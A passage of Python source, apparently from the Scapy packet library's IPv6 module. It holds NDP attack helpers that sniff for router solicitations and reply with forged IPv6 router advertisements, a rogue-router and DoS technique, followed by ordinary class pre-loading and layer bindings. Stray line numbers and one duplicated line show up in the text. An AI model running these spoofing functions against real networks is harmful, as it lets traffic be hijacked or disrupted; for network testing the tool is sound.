        # Add it a PIO from the request ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            # Keep a reference on what follows this PIO to continue the
            # search, then detach it so that only the PIO itself is appended.
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)

4116 

4117 

def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Send the provided RA message at layer 2 (i.e. providing a packet
    starting with IPv6 will not work) in response to received RS messages.
    In the end, the function is a simple wrapper around sendp() that
    monitors the link for RS messages.

    It is probably better explained with an example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    Following arguments can be used to change the behavior:

      ra: the RA message to send in response to received RS message.

      iface: a specific interface (e.g. "eth0") of the system on which the
             DoS should be launched. If none is provided, conf.iface is
             used.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RS messages received from this source will trigger a reply.
         Note that the provided RA is sent unchanged, which implies that if
         you intend to target only the source of the RS using this option,
         you will have to set the Ethernet destination address to the same
         value in your RA.
         The default value for this parameter is None: no filtering on the
         source of RS is done.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RS messages received from this source address will trigger
         replies. Same comment as for the previous argument applies: if you
         use the option, you will probably want to set a specific Ethernet
         destination address in the RA.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell whether req is an RS that passes both source filters
        """

        if Ether not in req or IPv6 not in req or ICMPv6ND_RS not in req:
            return 0

        # A filter left unset (None) accepts every source.
        if mac_src_filter and req[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return 0

        return 1

    def ra_reply_callback(req, iface):
        """
        Emit the user-supplied RA as an answer to the RS held in req
        """

        solicitor = req[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % solicitor)

    if not iface:
        iface = conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=lambda pkt: is_request(pkt, mac_src_filter, ip_src_filter),
          prn=lambda pkt: ra_reply_callback(pkt, iface),
          iface=iface)

4197 

4198############################################################################# 

4199# Pre-load classes ## 

4200############################################################################# 

4201 

4202 

def _get_cls(name):
    """
    Return the module-level object called name, or Raw when this module
    defines no such name.
    """
    module_namespace = globals()
    resolved = module_namespace.get(name, Raw)
    return resolved

4205 

4206 

def _load_dict(d):
    """
    Replace, in place, each value of d (a name) with the object that
    _get_cls() returns for that name. Keys are left untouched.
    """
    # Iterate over a snapshot of the keys; only values are reassigned.
    for key in list(d):
        d[key] = _get_cls(d[key])

4210 

4211 

# Replace, in place, the names stored as values in these three tables with the
# module-level objects of the same name; names this module does not define
# resolve to Raw (see _get_cls).
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)

4215 

4216############################################################################# 

4217############################################################################# 

4218# Layers binding # 

4219############################################################################# 

4220############################################################################# 

4221 

# Register IPv6 (and IPv46 for the catch-all / raw types) in the layer 3 and
# layer 2 type tables of the configuration.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
if OPENBSD:
    conf.l2types.register_num2layer(229, IPv6)

# Encapsulations carrying IPv6, all keyed on the value 0x86dd.
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
if WINDOWS:
    bind_layers(Loopback, IPv6, type=0x18)
else:
    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# Upper layers selected by the Next Header value (nh), and tunnelling of
# IPv6 in IPv4 / IPv6 and of IPv4 / GRE in IPv6.
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)

4248bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)